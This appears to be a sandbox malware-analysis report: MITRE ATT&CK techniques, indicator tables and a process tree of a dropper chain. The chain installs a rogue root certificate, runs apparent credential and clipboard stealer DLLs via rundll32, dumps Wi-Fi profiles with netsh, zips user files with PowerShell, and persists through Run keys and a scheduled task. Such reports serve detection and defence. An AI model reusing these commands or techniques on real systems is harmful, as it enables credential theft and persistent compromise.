Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	propro.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	propro.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
224	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4876	5d4f53ab1cf64d5e32b87c37aebcdc3c.exe
4876	5d4f53ab1cf64d5e32b87c37aebcdc3c.exe
4280	explorha.exe
4280	explorha.exe
4444	e763ecc4e7.exe
4444	e763ecc4e7.exe
1120	amert.exe
1120	amert.exe
4344	explorha.exe
4344	explorha.exe
4368	chrome.exe
4368	chrome.exe
2336	rundll32.exe
2336	rundll32.exe
2336	rundll32.exe
2336	rundll32.exe
2336	rundll32.exe
2336	rundll32.exe
2336	rundll32.exe
2336	rundll32.exe
2336	rundll32.exe
2336	rundll32.exe
3328	explorgu.exe
3328	explorgu.exe
3528	explorha.exe
3528	explorha.exe
3008	Traffic.exe
3008	Traffic.exe
3008	Traffic.exe
3008	Traffic.exe
3008	Traffic.exe
3008	Traffic.exe
3008	Traffic.exe
3008	Traffic.exe
3008	Traffic.exe
3008	Traffic.exe
3008	Traffic.exe
3008	Traffic.exe
3008	Traffic.exe
3008	Traffic.exe
3008	Traffic.exe
3008	Traffic.exe
5980	rundll32.exe
5980	rundll32.exe
5980	rundll32.exe
5980	rundll32.exe
5980	rundll32.exe
5980	rundll32.exe
5116	RegAsm.exe
5116	RegAsm.exe
5116	RegAsm.exe
5116	RegAsm.exe
5116	RegAsm.exe
5116	RegAsm.exe
5116	RegAsm.exe
5116	RegAsm.exe
5116	RegAsm.exe
5116	RegAsm.exe
5116	RegAsm.exe
5116	RegAsm.exe
5116	RegAsm.exe
5116	RegAsm.exe
5116	RegAsm.exe
5116	RegAsm.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe
Token: SeShutdownPrivilege	4368	chrome.exe
Token: SeCreatePagefilePrivilege	4368	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4876	5d4f53ab1cf64d5e32b87c37aebcdc3c.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4488	844b18c601.exe
4488	844b18c601.exe
4368	chrome.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4368	chrome.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
4488	844b18c601.exe
5412	u42s.1.exe
5412	u42s.1.exe
5412	u42s.1.exe
5412	u42s.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4876 wrote to memory of 4280	4876	5d4f53ab1cf64d5e32b87c37aebcdc3c.exe	89
PID 4876 wrote to memory of 4280	4876	5d4f53ab1cf64d5e32b87c37aebcdc3c.exe	89
PID 4876 wrote to memory of 4280	4876	5d4f53ab1cf64d5e32b87c37aebcdc3c.exe	89
PID 4280 wrote to memory of 4444	4280	explorha.exe	95
PID 4280 wrote to memory of 4444	4280	explorha.exe	95
PID 4280 wrote to memory of 4444	4280	explorha.exe	95
PID 4280 wrote to memory of 848	4280	explorha.exe	96
PID 4280 wrote to memory of 848	4280	explorha.exe	96
PID 4280 wrote to memory of 848	4280	explorha.exe	96
PID 4280 wrote to memory of 1120	4280	explorha.exe	99
PID 4280 wrote to memory of 1120	4280	explorha.exe	99
PID 4280 wrote to memory of 1120	4280	explorha.exe	99
PID 4280 wrote to memory of 4488	4280	explorha.exe	101
PID 4280 wrote to memory of 4488	4280	explorha.exe	101
PID 4280 wrote to memory of 4488	4280	explorha.exe	101
PID 4488 wrote to memory of 4368	4488	844b18c601.exe	102
PID 4488 wrote to memory of 4368	4488	844b18c601.exe	102
PID 4368 wrote to memory of 4992	4368	chrome.exe	104
PID 4368 wrote to memory of 4992	4368	chrome.exe	104
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 60	4368	chrome.exe	105
PID 4368 wrote to memory of 2232	4368	chrome.exe	106
PID 4368 wrote to memory of 2232	4368	chrome.exe	106
PID 4368 wrote to memory of 1216	4368	chrome.exe	107
PID 4368 wrote to memory of 1216	4368	chrome.exe	107
PID 4368 wrote to memory of 1216	4368	chrome.exe	107
PID 4368 wrote to memory of 1216	4368	chrome.exe	107
PID 4368 wrote to memory of 1216	4368	chrome.exe	107

C:\Users\Admin\AppData\Local\Temp\5d4f53ab1cf64d5e32b87c37aebcdc3c.exe
"C:\Users\Admin\AppData\Local\Temp\5d4f53ab1cf64d5e32b87c37aebcdc3c.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4876
- C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
  "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4280
- - C:\Users\Admin\AppData\Local\Temp\1000042001\e763ecc4e7.exe
    "C:\Users\Admin\AppData\Local\Temp\1000042001\e763ecc4e7.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:4444
- - C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
    "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
    3⤵
    PID:848
- - C:\Users\Admin\AppData\Local\Temp\1000049001\amert.exe
    "C:\Users\Admin\AppData\Local\Temp\1000049001\amert.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    PID:1120
- - C:\Users\Admin\AppData\Local\Temp\1000051001\844b18c601.exe
    "C:\Users\Admin\AppData\Local\Temp\1000051001\844b18c601.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4488
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:4368
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffa03e99758,0x7ffa03e99768,0x7ffa03e99778
        5⤵
        
        PID:4992
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1664 --field-trial-handle=1892,i,4471683526823761715,2661407015345584948,131072 /prefetch:2
        5⤵
        
        PID:60
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1892,i,4471683526823761715,2661407015345584948,131072 /prefetch:8
        5⤵
        
        PID:2232
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1780 --field-trial-handle=1892,i,4471683526823761715,2661407015345584948,131072 /prefetch:8
        5⤵
        
        PID:1216
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2988 --field-trial-handle=1892,i,4471683526823761715,2661407015345584948,131072 /prefetch:1
        5⤵
        
        PID:4356
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1892,i,4471683526823761715,2661407015345584948,131072 /prefetch:1
        5⤵
        
        PID:2044
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4572 --field-trial-handle=1892,i,4471683526823761715,2661407015345584948,131072 /prefetch:1
        5⤵
        
        PID:2892
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 --field-trial-handle=1892,i,4471683526823761715,2661407015345584948,131072 /prefetch:8
        5⤵
        
        PID:3496
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3264 --field-trial-handle=1892,i,4471683526823761715,2661407015345584948,131072 /prefetch:8
        5⤵
        
        PID:1332
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4064 --field-trial-handle=1892,i,4471683526823761715,2661407015345584948,131072 /prefetch:8
        5⤵
        
        PID:1556
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
    3⤵
    - Loads dropped DLL
    PID:4600
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:2336
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:220
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\660967641992_Desktop.zip' -CompressionLevel Optimal
        5⤵
        
        PID:2044
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    PID:4328

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4344

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4900

C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3328
- C:\Users\Admin\AppData\Local\Temp\1000985001\alexxxxxxxx.exe
  "C:\Users\Admin\AppData\Local\Temp\1000985001\alexxxxxxxx.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2324
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Checks computer location settings
    PID:4800
  - - C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:3008
  - - C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      PID:4908
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
      4⤵
      PID:5936
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:6020
- C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe
  "C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe"
  2⤵
  - Blocklisted process makes network request
  - Executes dropped EXE
  PID:4824
- C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe
  "C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4400
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5116
- C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
  "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:1152
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:1692
- C:\Users\Admin\AppData\Local\Temp\1001073001\swiiiii.exe
  "C:\Users\Admin\AppData\Local\Temp\1001073001\swiiiii.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2812
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3768
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 868
    3⤵
    - Program crash
    PID:5168
- C:\Users\Admin\AppData\Local\Temp\1001078001\koooooo.exe
